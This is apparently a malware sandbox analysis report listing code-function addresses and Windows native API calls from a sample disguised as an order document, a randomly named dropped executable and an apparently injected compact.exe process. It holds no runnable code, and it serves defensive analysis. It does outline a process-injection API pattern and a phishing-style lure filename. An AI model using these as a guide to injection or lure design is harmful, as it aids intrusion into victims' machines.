            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_03602D30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602D10 NtMapViewOfSection,LdrInitializeThunk,10_2_03602D10
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_03602DF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602DD0 NtDelayExecution,LdrInitializeThunk,10_2_03602DD0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602C60 NtCreateKey,LdrInitializeThunk,10_2_03602C60
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_03602C70
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_03602CA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036035C0 NtCreateMutant,LdrInitializeThunk,10_2_036035C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036039B0 NtGetContextThread,LdrInitializeThunk,10_2_036039B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602B80 NtQueryInformationFile,10_2_03602B80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602AB0 NtWaitForSingleObject,10_2_03602AB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602F60 NtCreateProcessEx,10_2_03602F60
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602FA0 NtQuerySection,10_2_03602FA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602F90 NtProtectVirtualMemory,10_2_03602F90
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602E30 NtWriteVirtualMemory,10_2_03602E30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602EA0 NtAdjustPrivilegesToken,10_2_03602EA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602D00 NtSetInformationFile,10_2_03602D00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602DB0 NtEnumerateKey,10_2_03602DB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602C00 NtQueryInformationProcess,10_2_03602C00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602CF0 NtOpenProcess,10_2_03602CF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602CC0 NtQueryVirtualMemory,10_2_03602CC0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03603010 NtOpenDirectoryObject,10_2_03603010
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03603090 NtSetValueKey,10_2_03603090
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03603D70 NtOpenThread,10_2_03603D70
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03603D10 NtOpenProcessToken,10_2_03603D10
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E382E0 NtClose,10_2_02E382E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E38250 NtDeleteFile,10_2_02E38250
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E38010 NtCreateFile,10_2_02E38010
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E38170 NtReadFile,10_2_02E38170
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E38430 NtAllocateVirtualMemory,10_2_02E38430
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A74B0C0_2_00A74B0C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A7D3640_2_00A7D364
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_047C6C580_2_047C6C58
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_047C5D300_2_047C5D30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_047C11980_2_047C1198
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_053072F00_2_053072F0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_05307F280_2_05307F28
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_053024600_2_05302460
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_053024590_2_05302459
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_053087790_2_05308779
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_0530279F0_2_0530279F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_053087880_2_05308788
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_053027EB0_2_053027EB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_0530F6300_2_0530F630
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_05303D300_2_05303D30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_05307F180_2_05307F18
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_05303EE30_2_05303EE3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_053019180_2_05301918
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_0530190A0_2_0530190A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_053079780_2_05307978
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_053079670_2_05307967
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_0530FA680_2_0530FA68
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004010B05_2_004010B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004031405_2_00403140
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0041020A5_2_0041020A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004102135_2_00410213
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0042DAB35_2_0042DAB3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00416B615_2_00416B61
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00416B635_2_00416B63
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004024605_2_00402460
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004104335_2_00410433
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0040E4B35_2_0040E4B3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004026605_2_00402660
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0040E68E5_2_0040E68E
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014481585_2_01448158
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B01005_2_013B0100
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145A1185_2_0145A118
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014781CC5_2_014781CC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014801AA5_2_014801AA
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014741A25_2_014741A2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014520005_2_01452000
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147A3525_2_0147A352
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014803E65_2_014803E6
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CE3F05_2_013CE3F0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014602745_2_01460274
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014402C05_2_014402C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C05355_2_013C0535
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014805915_2_01480591
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014724465_2_01472446
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014644205_2_01464420
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146E4F65_2_0146E4F6
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C07705_2_013C0770
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E47505_2_013E4750
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BC7C05_2_013BC7C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DC6E05_2_013DC6E0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D69625_2_013D6962
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C29A05_2_013C29A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0148A9A65_2_0148A9A6
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C28405_2_013C2840
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CA8405_2_013CA840
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013A68B85_2_013A68B8
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013EE8F05_2_013EE8F0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147AB405_2_0147AB40
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01476BD75_2_01476BD7
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BEA805_2_013BEA80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CAD005_2_013CAD00
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145CD1F5_2_0145CD1F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D8DBF5_2_013D8DBF
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013BADE05_2_013BADE0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0C005_2_013C0C00
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B0CF25_2_013B0CF2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01460CB55_2_01460CB5
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01434F405_2_01434F40
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013E0F305_2_013E0F30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01402F285_2_01402F28
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01462F305_2_01462F30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CCFE05_2_013CCFE0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0143EFA05_2_0143EFA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B2FC85_2_013B2FC8
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147EE265_2_0147EE26
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C0E595_2_013C0E59
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147EEDB5_2_0147EEDB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013D2E905_2_013D2E90
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147CE935_2_0147CE93
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0148B16B5_2_0148B16B
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AF1725_2_013AF172
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F516C5_2_013F516C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013CB1B05_2_013CB1B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146F0CC5_2_0146F0CC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147F0E05_2_0147F0E0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014770E95_2_014770E9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C70C05_2_013C70C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147132D5_2_0147132D
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013AD34C5_2_013AD34C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0140739A5_2_0140739A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C52A05_2_013C52A0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014612ED5_2_014612ED
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DB2C05_2_013DB2C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014775715_2_01477571
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145D5B05_2_0145D5B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B14605_2_013B1460
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147F43F5_2_0147F43F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147F7B05_2_0147F7B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014056305_2_01405630
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014716CC5_2_014716CC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014559105_2_01455910
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C99505_2_013C9950
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DB9505_2_013DB950
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142D8005_2_0142D800
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C38E05_2_013C38E0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FB765_2_0147FB76
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01435BF05_2_01435BF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DFB805_2_013DFB80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013FDBF95_2_013FDBF9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01477A465_2_01477A46
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FA495_2_0147FA49
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01433A6C5_2_01433A6C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146DAC65_2_0146DAC6
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01405AA05_2_01405AA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01461AA35_2_01461AA3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145DAAC5_2_0145DAAC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01471D5A5_2_01471D5A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01477D735_2_01477D73
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C3D405_2_013C3D40
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DFDC05_2_013DFDC0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01439C325_2_01439C32
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FCF25_2_0147FCF2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FF095_2_0147FF09
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C1F925_2_013C1F92
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01383FD25_2_01383FD2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01383FD55_2_01383FD5
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FFB15_2_0147FFB1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C9EB05_2_013C9EB0
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_040770259_2_04077025
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_04078DD99_2_04078DD9
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_04078DE29_2_04078DE2
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_040966829_2_04096682
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_0407F7329_2_0407F732
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_0407F7309_2_0407F730
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_040790029_2_04079002
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_040770829_2_04077082
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_0407725D9_2_0407725D
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368A35210_2_0368A352
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036903E610_2_036903E6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DE3F010_2_035DE3F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367027410_2_03670274
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036502C010_2_036502C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0365815810_2_03658158
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035C010010_2_035C0100
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366A11810_2_0366A118
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036881CC10_2_036881CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036901AA10_2_036901AA
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366200010_2_03662000
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035F475010_2_035F4750
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D077010_2_035D0770
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035CC7C010_2_035CC7C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EC6E010_2_035EC6E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D053510_2_035D0535
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0369059110_2_03690591
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368244610_2_03682446
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367442010_2_03674420
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367E4F610_2_0367E4F6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368AB4010_2_0368AB40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03686BD710_2_03686BD7
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035CEA8010_2_035CEA80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035E696210_2_035E6962
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0369A9A610_2_0369A9A6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D29A010_2_035D29A0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DA84010_2_035DA840
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D284010_2_035D2840
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035FE8F010_2_035FE8F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035B68B810_2_035B68B8
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03644F4010_2_03644F40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03612F2810_2_03612F28
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03672F3010_2_03672F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035F0F3010_2_035F0F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035C2FC810_2_035C2FC8
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DCFE010_2_035DCFE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0364EFA010_2_0364EFA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D0E5910_2_035D0E59
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368EE2610_2_0368EE26
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368EEDB10_2_0368EEDB
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035E2E9010_2_035E2E90
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368CE9310_2_0368CE93
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DAD0010_2_035DAD00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366CD1F10_2_0366CD1F
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035CADE010_2_035CADE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035E8DBF10_2_035E8DBF
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D0C0010_2_035D0C00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035C0CF210_2_035C0CF2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03670CB510_2_03670CB5
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035BD34C10_2_035BD34C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368132D10_2_0368132D
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0361739A10_2_0361739A
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036712ED10_2_036712ED
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EB2C010_2_035EB2C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D52A010_2_035D52A0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0369B16B10_2_0369B16B
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0360516C10_2_0360516C
